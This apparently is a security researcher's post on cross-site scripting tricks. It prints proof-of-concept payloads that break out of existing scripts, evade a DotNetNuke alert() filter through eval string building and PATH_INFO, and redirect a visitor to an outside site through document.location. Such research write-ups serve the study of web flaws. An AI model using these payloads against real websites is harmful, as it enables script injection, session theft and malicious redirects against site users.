Some XSS Tricks

I had submitted some XSS vulnerabilities in xssed.com by these names:

BugReport.ir (before soroush.secproject.com website)

And

Soroush.SecProject.Com (nowadays)

Now, because of using some tricks in these XSSes, they can be interesting. I want to describe some of these tricks here:

1- Insert JavaScript code inside of available script. In order to insert proper arbitrary JavaScript, we must insert something to close left side of JavaScript, then insert our own JavaScript, and finally close the right side of JavaScript to prevent errors.

As you can see in “http://www.xssed.com/mirror/39834/”, the XSS query is this:

?sx=”});};document.write(‘This is XSS test – BugReport.ir’);alert(‘Safe XSS BugReport.ir’);function startVideoPlayer(){getFailQS({destURL:””,show:”

In this query, first I closed the defined function by [“});};] , and then I inserted my arbitrary script there. After that, I used [function startVideoPlayer(){getFailQS({destURL:””,show:”]  to open a function to complete the right side of the code to prevent a JavaScript error.

You can see some other example of this group:

http://www.xssed.com/mirror/41138/

http://www.xssed.com/mirror/41800/

http://www.xssed.com/mirror/55622/

2- Insert JavaScript code in another format. Sometimes we can insert our JavaScript code via the some other forms of input such as Base64. In this way, we must look for algorithms of inputs.

As you can see in “http://www.xssed.com/mirror/55624/”, I inserted a Base64 string in order to perform XSS attack.

3- Using http://ha.ckers.org/xss.html techniques. There are always something new and fantastic in this XSS cheat sheet! I learned many things from it.

Example to bypass filters: “http://www.xssed.com/mirror/56197/”

4- Use your own idea to insert your codes. We must be creative in performing XSS. For example in “http://www.xssed.com/mirror/56651/”, I could not insert any string for my alert() function, so I insert something in title of the page, and then read them in my alert() function. It is obvious that I could use eval() function to execute some codes by this method.

?wrd=Tested in Mozilla (Onmouseover) — IRSDL is HERE — Soroush.SecProject.Com — Another XSS Trick in Yahoo&prn=[irsdl]&pth=test&opt=onmouseover%3dalert(window.document.title.substring(15)) onmouseout%3dalert(/SeeYou/)

Another example is “http://www.xssed.com/mirror/40384/” which is based on the “http://www.bugreport.ir/index_38.htm”:

[DNN URL] /Default.aspx/”onmouseover=”x=’al’;x=x+’ert(/WWW.BugReport.IR/)’;eval(x);alert().aspx

In this XSS, I used a feature of .Net which is “Slash after .aspx” in order to change PATH_INFO parameter in Server Variable. As “Dot Net Nuke (DNN)” used PATH_INFO instead of URL parameter, path was inserted into the default.aspx page without any checking. So I inserted “onmouseover” event there. But, there was a problem with alert() function which DNN could recognize it and omit it plus all of the string after it! So, I inserted alert() function as a string into the “x” variable, and then evaluate it by using eval() function. Another problem was that DNN needed “.aspx” at the end of the request (before Get parameters)! So, I inserted an “alert().aspx” at the end of the query which I knew that DNN will omit it plus all the string after that.

Moreover, you can see in “http://www.bugreport.ir/index_38.htm” that I used another query which is:

http://[DNN URL]/Default.aspx/bugreport/”onmouseover=”var a=’.aspx?’;document.location=’http://www.bugreport.ir/?archive’;

In this example, I must use a “:” for the “http://www.bugreport.ir/?archive”, but I could not insert it before the “?” because of getting error by the IIS (“:” is used to indicate a port). So, I inserted a “.aspx?” in a temp “a” variable in order to have: 1- a “.aspx” at the end of the query (before Get parameters) 2- insert “:” into the “http://”.

Note: I could not use “onmoueover” after the “?” because it replaced the double quotation in Get parameter by %22.

Good Luck.